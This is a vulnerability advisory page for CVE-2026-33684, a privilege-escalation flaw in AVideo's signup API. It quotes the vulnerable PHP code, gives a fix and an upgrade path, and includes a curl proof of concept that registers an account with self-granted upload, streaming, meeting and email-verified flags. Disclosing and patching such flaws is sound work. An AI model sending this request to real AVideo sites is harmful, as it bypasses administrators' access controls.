AVideo CVE-2026-33684
MEDIUMSeverity by source
AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Network-accessible endpoint, CAPTCHA solved by attacker (not UI:R), no prior auth required, impact limited to integrity of own account permissions with no confidentiality or availability effect.
Primary rating from Vendor (https://github.com/WWBN/AVideo).
CVSS VectorVendor: https://github.com/WWBN/AVideo
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Lifecycle Timeline
2DescriptionCVE.org
Summary
The set_api_signUp method in the API plugin accepts emailVerified, canUpload, canStream, and canCreateMeet parameters from user-supplied input and applies them to newly created accounts without verifying that the request was authenticated with a valid APISecret. Any anonymous user who can solve a CAPTCHA can self-grant elevated permissions during account registration.
Details
The authentication check in set_api_signUp (plugin/API/API.php:4222) allows either a valid APISecret (admin-level credential) or a solved CAPTCHA (anonymous access):
// plugin/API/API.php:4222-4232
if ($obj->APISecret !== @$_REQUEST['APISecret']) {
if(empty($_REQUEST['captcha'])){
return new ApiObject("Captcha is required");
}
require_once $global['systemRootPath'] . 'objects/captcha.php';
$valid = Captcha::validation($_REQUEST['captcha']);
if(!$valid){
return new ApiObject("Captcha is wrong, reload it and try again");
}
}After this check, both code paths (APISecret and CAPTCHA) reach the privilege parameter handling unconditionally:
// plugin/API/API.php:4238-4249
if (isset($_REQUEST['emailVerified'])) {
$global['emailVerified'] = intval($_REQUEST['emailVerified']);
}
if (isset($_REQUEST['canCreateMeet'])) {
$global['canCreateMeet'] = intval($_REQUEST['canCreateMeet']);
}
if (isset($_REQUEST['canStream'])) {
$global['canStream'] = intval($_REQUEST['canStream']);
}
if (isset($_REQUEST['canUpload'])) {
$global['canUpload'] = intval($_REQUEST['canUpload']);
}These $global values are then consumed by User::save() (objects/user.php:829-840), which overrides the user object's permission fields:
// objects/user.php:829-840
if (isset($global['emailVerified'])) {
$this->emailVerified = $global['emailVerified'];
}
if (isset($global['canCreateMeet'])) {
$this->canCreateMeet = $global['canCreateMeet'];
}
if (isset($global['canStream'])) {
$this->canStream = $global['canStream'];
}
if (isset($global['canUpload'])) {
$this->canUpload = $global['canUpload'];
}Note that even though userCreate.json.php:90 sets canUpload from the site's default configuration, User::save() subsequently overrides it with the attacker-controlled $global value.
The codebase already uses self::isAPISecretValid() to guard admin-only operations in other API methods (e.g., lines 294, 991, 1664, 2150), but this check is missing for the privilege parameters in set_api_signUp.
PoC
# Step 1: Get a CAPTCHA token
# (Navigate to the signup page in a browser, solve the CAPTCHA, capture the token)
# Step 2: Register with elevated privileges
curl -X POST 'https://target/plugin/API/set.json.php' \
-d 'APIName=signUp' \
-d 'user=attacker' \
-d 'pass=Password123!' \
-d 'email=attacker@example.com' \
-d 'name=Attacker' \
-d 'captcha=VALID_CAPTCHA_TOKEN' \
-d 'emailVerified=1' \
-d 'canUpload=1' \
-d 'canStream=1' \
-d 'canCreateMeet=1'
# Expected: Account created with default (restricted) permissions
# Actual: Account created with upload, stream, and meet permissions enabled,
# plus email marked as verified
# Step 3: Verify elevated permissions by logging in and checking profile
curl -X POST 'https://target/plugin/API/set.json.php' \
-d 'APIName=signIn' \
-d 'user=attacker' \
-d 'pass=Password123!'
# Response will show canUpload=1, canStream=1, canCreateMeet=1, emailVerified=1Impact
- Email verification bypass: Attackers can mark their accounts as email-verified without owning the email address, bypassing any email-gated functionality
- Unauthorized upload access: Self-granted upload permissions allow uploading potentially malicious video content to the platform
- Unauthorized streaming access: Self-granted streaming permissions allow unauthorized live streaming
- Unauthorized meeting creation: Self-granted meet permissions allow creating meetings on the platform
- Policy bypass: Platform administrators who intentionally restrict these permissions for new users (e.g., requiring manual approval before granting upload rights) have their access controls circumvented
Recommended Fix
Wrap the privilege parameter handling in an isAPISecretValid() check so that only admin-authenticated requests can set these values:
// plugin/API/API.php - replace lines 4238-4249 with:
if (self::isAPISecretValid()) {
if (isset($_REQUEST['emailVerified'])) {
$global['emailVerified'] = intval($_REQUEST['emailVerified']);
}
if (isset($_REQUEST['canCreateMeet'])) {
$global['canCreateMeet'] = intval($_REQUEST['canCreateMeet']);
}
if (isset($_REQUEST['canStream'])) {
$global['canStream'] = intval($_REQUEST['canStream']);
}
if (isset($_REQUEST['canUpload'])) {
$global['canUpload'] = intval($_REQUEST['canUpload']);
}
}AnalysisAI
Unauthenticated privilege escalation in AVideo (composer/wwbn/avideo) versions below 29.0 allows any user who can solve a CAPTCHA to self-grant upload, streaming, meeting-creation, and email-verified status during account registration. The root cause is that set_api_signUp in plugin/API/API.php applies admin-controlled permission parameters (emailVerified, canUpload, canStream, canCreateMeet) unconditionally across both its authenticated (APISecret) and anonymous (CAPTCHA) code paths, bypassing the isAPISecretValid() guard that correctly protects equivalent admin operations elsewhere in the codebase. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | The only prerequisite is access to the AVideo registration API endpoint (`/plugin/API/set.json.php?APIName=signUp` or equivalent POST) and the ability to obtain a valid CAPTCHA token, which can be done by loading the registration page in a browser or using an automated CAPTCHA-solving service. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The NVD-assigned CVSS 3.1 score of 5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) classifies impact as limited integrity modification, which technically captures the metric but understates real-world business risk: the integrity impact is not arbitrary data corruption but a deliberate bypass of administrator-controlled access policies governing who may upload content, stream live video, and create meetings on the platform. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker navigates to the AVideo signup page, solves the CAPTCHA challenge (or uses a CAPTCHA-solving service), then submits a POST request to `/plugin/API/set.json.php` with `APIName=signUp` and appends `emailVerified=1&canUpload=1&canStream=1&canCreateMeet=1` alongside their registration data. The server creates the account, applies the attacker-controlled permission values through the unguarded `User::save()` path, and returns a session confirming the elevated rights. … |
| Remediation | Upgrade to AVideo version 29.0, which resolves the issue by wrapping the privilege-parameter handling block in a `self::isAPISecretValid()` guard so that `emailVerified`, `canUpload`, `canStream`, and `canCreateMeet` can only be set via admin-authenticated API requests. … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not
(1) boardData102.php, (2) boardData103.php, (3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php in Netgear
ProjectSend versions prior to r1720 are affected by an improper authentication vulnerability. Rated critical severity (C
Roundcube Webmail contains a critical PHP object deserialization vulnerability (CVE-2025-49113, CVSS 9.9) that allows au
Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP c
Palo Alto Networks PAN-OS management web interface contains an authentication bypass allowing unauthenticated attackers
Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re
Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re
The get_referers function in /opt/ws/bin/sblistpack in Sophos Web Appliance before 3.7.9.1 and 3.8 before 3.8.1.1 allows
The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1
NetAlertX (formerly PiAlert) versions 23.01.14 through 24.x before 24.10.12 allow unauthenticated command injection thro
The GiveWP - Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all
Same weakness CWE-862 – Missing Authorization
View allSame technique Authentication Bypass
View allShare
External POC / Exploit Code
Leaving vuln.today
GHSA-8j8m-p79x-g4jm